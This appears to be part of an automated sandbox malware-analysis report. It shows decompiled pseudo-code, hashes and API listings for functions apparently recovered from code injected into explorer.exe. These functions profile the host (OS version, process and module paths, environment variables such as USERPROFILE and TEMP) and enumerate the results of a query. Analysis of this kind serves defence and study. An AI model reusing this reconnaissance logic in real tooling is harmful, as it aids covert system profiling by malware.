                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




                  0x000898aa
                  0x000898bc
                  0x000898ca
                  0x000898d7
                  0x000898da
                  0x000898e1
                  0x000898e1
                  0x00000000
                  0x000898e6
                  0x00000000

                  APIs
                  • CloseHandle.KERNELBASE(?), ref: 000898CA
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
                  • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                  • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0xe7f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0xe7f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








                  0x0008b337
                  0x0008b33f
                  0x0008b344
                  0x0008b34a
                  0x0008b34e
                  0x0008b350
                  0x0008b355
                  0x0008b35e
                  0x0008b362
                  0x0008b362
                  0x0008b36a
                  0x00000000
                  0x0008b36d
                  0x0008b371

                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0xe7f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0xe7fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0xe7fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0xe7f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0xe7f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0xe7f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0xe7f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0xe7f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0xe7f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































                  0x0008d01f
                  0x0008d029
                  0x0008d035
                  0x0008d03a
                  0x0008d03f
                  0x0008d3ff
                  0x0008d3ff
                  0x0008d04c
                  0x0008d052
                  0x0008d057
                  0x0008d05d
                  0x0008d06d
                  0x0008d079
                  0x0008d079
                  0x0008d082
                  0x0008d088
                  0x0008d08a
                  0x0008d093
                  0x0008d093
                  0x0008d09f
                  0x0008d0a3
                  0x0008d0a8
                  0x0008d0ae
                  0x0008d0b7
                  0x0008d0c5
                  0x0008d0cc
                  0x0008d0d1
                  0x0008d0d1
                  0x0008d0d2
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0b9
                  0x0008d0d8
                  0x0008d0e3
                  0x0008d0f1
                  0x0008d0f7
                  0x0008d0fb
                  0x0008d101
                  0x0008d108
                  0x0008d10f
                  0x0008d113
                  0x0008d11a
                  0x0008d11b
                  0x0008d128
                  0x0008d12a
                  0x0008d12f
                  0x0008d13c
                  0x0008d13e
                  0x0008d13e
                  0x0008d140
                  0x0008d14a
                  0x0008d156
                  0x0008d166
                  0x0008d16c
                  0x0008d172
                  0x0008d174
                  0x0008d185
                  0x0008d18b
                  0x0008d191
                  0x0008d196
                  0x0008d19c
                  0x0008d1a2
                  0x0008d1a7
                  0x0008d1ac
                  0x0008d1ac
                  0x0008d1b2
                  0x0008d1b2
                  0x0008d1bb
                  0x0008d1c7
                  0x0008d1cf
                  0x0008d1d3
                  0x0008d1d3
                  0x0008d1cf
                  0x0008d1d7
                  0x0008d1dd
                  0x0008d1e3
                  0x0008d1ea
                  0x0008d1fb
                  0x0008d201
                  0x0008d209
                  0x0008d210
                  0x0008d223
                  0x0008d229
                  0x0008d22e
                  0x0008d231
                  0x0008d234
                  0x0008d23a
                  0x0008d240
                  0x0008d242
                  0x0008d248
                  0x0008d251
                  0x0008d254
                  0x0008d254
                  0x0008d257
                  0x0008d25f
                  0x0008d26a
                  0x0008d270
                  0x0008d261
                  0x0008d263
                  0x0008d263
                  0x0008d279
                  0x0008d279
                  0x0008d27f
                  0x0008d287
                  0x0008d292
                  0x0008d297
                  0x0008d29d
                  0x0008d29f
                  0x0008d2ac
                  0x0008d2ad
                  0x0008d2ae
                  0x0008d2b9
                  0x0008d2bb
                  0x0008d2c2
                  0x0008d2c2
                  0x0008d2cc
                  0x0008d2d1
                  0x0008d2d6
                  0x0008d2d6
                  0x0008d2dc
                  0x0008d2e3
                  0x0008d2e4
                  0x0008d2f1
                  0x0008d304
                  0x0008d309
                  0x0008d30e
                  0x0008d317
                  0x0008d317
                  0x0008d31d
                  0x0008d322
                  0x0008d328
                  0x0008d32e
                  0x0008d333
                  0x0008d33c
                  0x0008d33e
                  0x0008d345
                  0x0008d345
                  0x0008d34b
                  0x0008d353
                  0x0008d358
                  0x0008d359
                  0x0008d35e
                  0x0008d367
                  0x0008d369
                  0x0008d374
                  0x0008d374
                  0x0008d37d
                  0x0008d385
                  0x0008d38c
                  0x0008d391
                  0x0008d3a0
                  0x0008d3b8
                  0x0008d3bf
                  0x0008d3cd
                  0x0008d3df
                  0x0008d3e6
                  0x0008d3f3
                  0x00000000

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetCurrentProcessId.KERNEL32 ref: 0008D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                  • GetCurrentProcess.KERNEL32 ref: 0008D09F
                  • GetLastError.KERNEL32 ref: 0008D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                  • GetLastError.KERNEL32 ref: 0008D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                  • GetCurrentProcess.KERNEL32 ref: 0008D20E
                  • memset.MSVCRT ref: 0008D229
                  • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                  • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 3876402152-2706916422
                  • Opcode ID: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                  • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                  • Opcode Fuzzy Hash: 273bfb211393cd56114f3bb121cdd4e9463ea66aaa9619a572f9bb9e4cc855bf
                  • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                  0x0008db45
                  0x0008db4b
                  0x0008db52
                  0x0008db55
                  0x0008db58
                  0x0008db5d
                  0x0008db5f
                  0x0008db64
                  0x0008dfac
                  0x0008dfac
                  0x0008db71
                  0x0008db73
                  0x0008db76
                  0x0008db79
                  0x0008df91
                  0x0008df97
                  0x0008dfa1
                  0x00000000
                  0x0008dfa6
                  0x0008db84
                  0x0008db8b
                  0x0008db92
                  0x0008db95
                  0x0008db9a
                  0x0008db9c
                  0x0008db9f
                  0x0008dba2
                  0x0008dba3
                  0x0008dbac
                  0x0008dbb2
                  0x0008dbb5
                  0x0008dbbe
                  0x0008dbc3
                  0x0008dbc8
                  0x0008dbdf
                  0x0008dbec
                  0x0008dbef
                  0x0008dbf6
                  0x0008dbfb
                  0x0008dc02
                  0x0008dc07
                  0x0008dc0e
                  0x0008dc10
                  0x0008dc1c
                  0x0008dc1f
                  0x0008dc21
                  0x0008df81
                  0x0008df82
                  0x0008df8b
                  0x00000000
                  0x0008df8b
                  0x0008dc27
                  0x0008dc2a
                  0x0008dc2d
                  0x0008dc30
                  0x0008dc32
                  0x0008df4d
                  0x0008df50
                  0x0008df53
                  0x0008df55
                  0x0008df77
                  0x0008df7c
                  0x0008df57
                  0x0008df5a
                  0x0008df65
                  0x0008df6c
                  0x0008df6c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dc38
                  0x0008dc38
                  0x0008dc4a
                  0x0008dc4d
                  0x0008dc4f
                  0x00000000
                  0x00000000
                  0x0008dc57
                  0x0008dc5a
                  0x0008dc5d
                  0x0008dc60
                  0x0008dc63
                  0x0008dc66
                  0x00000000
                  0x00000000
                  0x0008dc6c
                  0x0008dc7a
                  0x0008dc7d
                  0x0008dc7f
                  0x0008dc98
                  0x0008dca7
                  0x0008dcaf
                  0x0008dcaf
                  0x0008dcb2
                  0x0008dcb9
                  0x0008dcbd
                  0x0008dcc3
                  0x0008dcc5
                  0x0008df35
                  0x0008df3b
                  0x0008df41
                  0x0008df44
                  0x0008df44
                  0x00000000
                  0x0008df44
                  0x0008dcd4
                  0x0008dce8
                  0x0008dcec
                  0x0008dcee
                  0x0008dcf3
                  0x0008df02
                  0x0008df08
                  0x0008df13
                  0x0008df1e
                  0x0008df24
                  0x0008df2a
                  0x0008df2d
                  0x00000000
                  0x0008df2d
                  0x0008dcf9
                  0x0008ded0
                  0x0008ded0
                  0x0008ded3
                  0x0008ded6
                  0x00000000
                  0x00000000
                  0x0008dd01
                  0x0008dd09
                  0x0008dd10
                  0x0008dd16
                  0x0008dd18
                  0x00000000
                  0x00000000
                  0x0008dd21
                  0x0008dd36
                  0x0008dd3c
                  0x0008dd45
                  0x0008dd48
                  0x0008dd4b
                  0x0008dd4d
                  0x0008dec3
                  0x0008dec6
                  0x0008decf
                  0x0008decf
                  0x00000000
                  0x0008decf
                  0x0008dd5d
                  0x0008dd60
                  0x0008dd67
                  0x0008dd6d
                  0x0008dd70
                  0x0008dd73
                  0x0008dd76
                  0x0008dd79
                  0x0008ddb5
                  0x0008ddb5
                  0x0008ddb8
                  0x0008de64
                  0x0008de78
                  0x0008de88
                  0x0008de8c
                  0x0008de8e
                  0x0008dea5
                  0x0008dea9
                  0x0008deb2
                  0x0008debd
                  0x00000000
                  0x0008debd
                  0x0008de94
                  0x0008de95
                  0x0008de9a
                  0x0008de9a
                  0x0008de9c
                  0x0008de9d
                  0x0008dea2
                  0x00000000
                  0x0008dea2
                  0x0008ddbe
                  0x0008ddbe
                  0x0008ddc1
                  0x0008de2c
                  0x0008de40
                  0x0008de50
                  0x0008de54
                  0x0008de56
                  0x00000000
                  0x00000000
                  0x0008de5c
                  0x0008de5d
                  0x00000000
                  0x0008de5d
                  0x0008ddc3
                  0x0008ddc3
                  0x0008ddc6
                  0x00000000
                  0x00000000
                  0x0008ddc8
